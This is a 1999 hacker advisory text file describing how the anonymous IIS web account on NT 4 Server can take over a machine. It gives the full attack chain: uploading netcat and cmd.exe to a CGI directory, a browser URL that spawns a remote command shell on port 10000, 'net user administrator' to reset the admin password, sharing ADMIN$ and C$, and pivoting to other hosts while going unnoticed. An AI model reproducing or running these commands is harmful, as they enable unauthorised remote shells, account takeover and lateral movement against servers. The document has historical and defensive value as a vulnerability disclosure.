iusr_bug.txt

`Internet User Bug Security Hole  
-kon.  
  
I've recently found a bug in NT 4 Server w/ IIS that allows the internet user (IUSR_COMPUTER)  
to change any user's password, including the administrators, leading to total server  
compromise.  
  
How it's done:  
  
The attacker must have access to the NT Server's web directory, along with an executable  
directory. This could be accomplished via brute forcing a netbios share, ftp, cold fusion,  
or other protocol/exploit to obtain a user's password. Checking access to the web   
directory, the attacker would upload nc.exe (http://www.l0pht.com/~weld/netcat/) and  
cmd.exe to the executable directory (let's say cgi-bin, scripts, iisadmpwd, etc   
directories). By entering the following command into the web browser:  
  
http://www.ntboxsomewhere.com/cgi-bin/cmd.exe?/c cgi-bin\nc.exe -L -p 10000 -t -e cmd.exe  
  
They will have spawned a remote DOS shell on the Server on port 10000 (substitute '%20'   
for spaces if needed). The attacker then telnet's to 'www.server.com' at port 10000 and   
is dropped to a DOS shell spawned in the cgi-bin directory:  
  
Microsoft(R) Windows NT(TM)  
(C) Copyright 1985-1996 Microsoft Corp.  
  
C:\InetPub\wwwroot\cgi-bin>  
  
When telnetting to this port, you are the user that spawned the shell, the IUSR_COMPUTER  
account. The next thing to try is the 'net' commands. This bug only works if 'net server   
stop' has been enacted by an administrator or other person with authority to do so. Here's  
the bug: type 'net start server' and the IUSR_COMPUTER can start the server. Incidentally,  
the IUSR_COMPUTER can also type 'net user administrator newpass' and will successfully  
change the administrator's password.  
If netlogon service didn't start with 'net start server', the attacker can now type   
'net start netlogon', and will now be able to map any drive to their computer. If need be,  
the IUSR_COMPUTER can also share drives now, including 'ADMIN$', 'C$', etc.  
After setting the administrator's new password and netlogon service, the next chain of   
events would be to administrate the remote computer's IIS using Internet Service Manager,  
and simply change the IUSR_COMPUTER's account to 'administrator' and type in the new  
password.  
Next, spawn a new remote DOS shell via the web browser, as this process is now started via  
the web user 'administrator'. The old shell was spawned under the IUSR_COMPUTER. While the  
attacker compromises security in this way, he can not use the the IUSR_COMPUTER account  
to 'net use \\ip_address\ipc$ /user:user password' from that box. Thus, the need for the  
account with such priveleges.  
Now, instead of just compromising the remote computer, the attacker can now use that  
computer to attack other NT boxes. Include the use of various console DOS exploits, plus  
ntreskit programs such as tlist.exe, kill.exe, netsvc.exe, etc, etc, their attack could go  
relatively unnoticed.  
  
I have not tried this with just uploading cmd.exe and net.exe and running the commands  
thru the browser yet, minus the use of netcat.  
  
Bug tested and works on all i've tried:  
NT 4 Server + sp1, sp2, sp3, sp4 and IIS 2.0 + 3.0 + 4.0  
I have not yet tried it with any combination not listed above.  
  
I do not know of any patches/fixes for this.  
  
Special thanks to: Weld Pond (http://www.l0pht.com/~weld)  
  
Comments, flames, bitches, beer, pizza, and porno to [email protected]  
  
6/10/99  
`